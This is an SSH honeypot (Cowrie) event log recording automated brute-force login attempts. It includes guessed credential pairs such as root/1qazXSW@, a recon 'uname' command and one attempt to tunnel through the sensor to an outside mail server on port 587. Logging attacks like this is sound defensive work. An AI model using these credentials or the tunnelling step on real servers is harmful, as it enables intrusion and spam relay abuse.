{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:40.793816Z","src_ip":"212.227.235.229","session":"4f5c82594b6d"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:13:41.571003Z","src_ip":"212.227.235.229","session":"4f5c82594b6d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:42.831453Z","src_ip":"212.227.235.229","session":"4f5c82594b6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34614,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e0a3cb7932d","protocol":"ssh","message":"New connection: 212.227.125.160:34614 (1.2.3.4:22) [session: 9e0a3cb7932d]","sensor":"my-vps","timestamp":"2025-08-28T07:13:50.166754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:50.167989Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:50.395345Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:13:51.078329Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:13:51.562464Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:13:51.563498Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:51.793957Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:51.795331Z","src_ip":"212.227.125.160","session":"9e0a3cb7932d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32844,"dst_ip":"1.2.3.4","dst_port":22,"session":"12749e04d694","protocol":"ssh","message":"New connection: 212.227.235.229:32844 (1.2.3.4:22) [session: 12749e04d694]","sensor":"my-vps","timestamp":"2025-08-28T07:13:56.547874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:13:56.548680Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:13:56.800458Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:13:58.226343Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:13:58.815632Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:13:58.816403Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:59.069535Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:13:59.070760Z","src_ip":"212.227.235.229","session":"12749e04d694"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39894,"dst_ip":"1.2.3.4","dst_port":22,"session":"51d1bc01465d","protocol":"ssh","message":"New connection: 212.227.125.160:39894 (1.2.3.4:22) [session: 51d1bc01465d]","sensor":"my-vps","timestamp":"2025-08-28T07:14:06.408561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:06.409562Z","src_ip":"212.227.125.160","session":"51d1bc01465d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:06.624487Z","src_ip":"212.227.125.160","session":"51d1bc01465d"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T07:14:07.271003Z","src_ip":"212.227.125.160","session":"51d1bc01465d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:08.488224Z","src_ip":"212.227.125.160","session":"51d1bc01465d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32978,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b77a686d664","protocol":"ssh","message":"New connection: 212.227.235.229:32978 (1.2.3.4:22) [session: 2b77a686d664]","sensor":"my-vps","timestamp":"2025-08-28T07:14:13.021327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:13.022317Z","src_ip":"212.227.235.229","session":"2b77a686d664"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:13.269886Z","src_ip":"212.227.235.229","session":"2b77a686d664"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T07:14:14.014605Z","src_ip":"212.227.235.229","session":"2b77a686d664"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:15.265343Z","src_ip":"212.227.235.229","session":"2b77a686d664"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50744,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d3369dc467b","protocol":"ssh","message":"New connection: 212.227.125.160:50744 (1.2.3.4:22) [session: 7d3369dc467b]","sensor":"my-vps","timestamp":"2025-08-28T07:14:22.783674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:22.784853Z","src_ip":"212.227.125.160","session":"7d3369dc467b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:23.009459Z","src_ip":"212.227.125.160","session":"7d3369dc467b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:14:23.688449Z","src_ip":"212.227.125.160","session":"7d3369dc467b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:24.915514Z","src_ip":"212.227.125.160","session":"7d3369dc467b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48826,"dst_ip":"1.2.3.4","dst_port":22,"session":"013ca46d6693","protocol":"ssh","message":"New connection: 212.227.235.229:48826 (1.2.3.4:22) [session: 013ca46d6693]","sensor":"my-vps","timestamp":"2025-08-28T07:14:29.283377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:29.284295Z","src_ip":"212.227.235.229","session":"013ca46d6693"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:29.532784Z","src_ip":"212.227.235.229","session":"013ca46d6693"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:14:30.280444Z","src_ip":"212.227.235.229","session":"013ca46d6693"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:31.531744Z","src_ip":"212.227.235.229","session":"013ca46d6693"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57572,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc973642810a","protocol":"ssh","message":"New connection: 212.227.125.160:57572 (1.2.3.4:22) [session: fc973642810a]","sensor":"my-vps","timestamp":"2025-08-28T07:14:38.924707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:38.925333Z","src_ip":"212.227.125.160","session":"fc973642810a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:14:39.148456Z","src_ip":"212.227.125.160","session":"fc973642810a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:14:39.820246Z","src_ip":"212.227.125.160","session":"fc973642810a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:41.050926Z","src_ip":"212.227.125.160","session":"fc973642810a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6378,"dst_ip":"1.2.3.4","dst_port":22,"session":"5388757e9257","protocol":"ssh","message":"New connection: 212.227.235.229:6378 (1.2.3.4:22) [session: 5388757e9257]","sensor":"my-vps","timestamp":"2025-08-28T07:14:41.587523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:14:41.588582Z","src_ip":"212.227.235.229","session":"5388757e9257"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:14:41.717331Z","src_ip":"212.227.235.229","session":"5388757e9257"}
{"eventid":"cowrie.login.success","username":"root","password":"gay","message":"login attempt [root/gay] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:14:42.322303Z","src_ip":"212.227.235.229","session":"5388757e9257"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T07:14:42.453105Z","session":"5388757e9257"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T07:14:42.582631Z","src_ip":"212.227.235.229","session":"5388757e9257"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:14:42.712389Z","src_ip":"212.227.235.229","session":"5388757e9257"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48176,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc1112856ca2","protocol":"ssh","message":"New connection: 212.227.235.229:48176 (1.2.3.4:22) [session: bc1112856ca2]","sensor":"my-vps","timestamp":"2025-08-28T07:14:45.433607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:14:45.434611Z","src_ip":"212.227.235.229","session":"bc1112856ca2"}
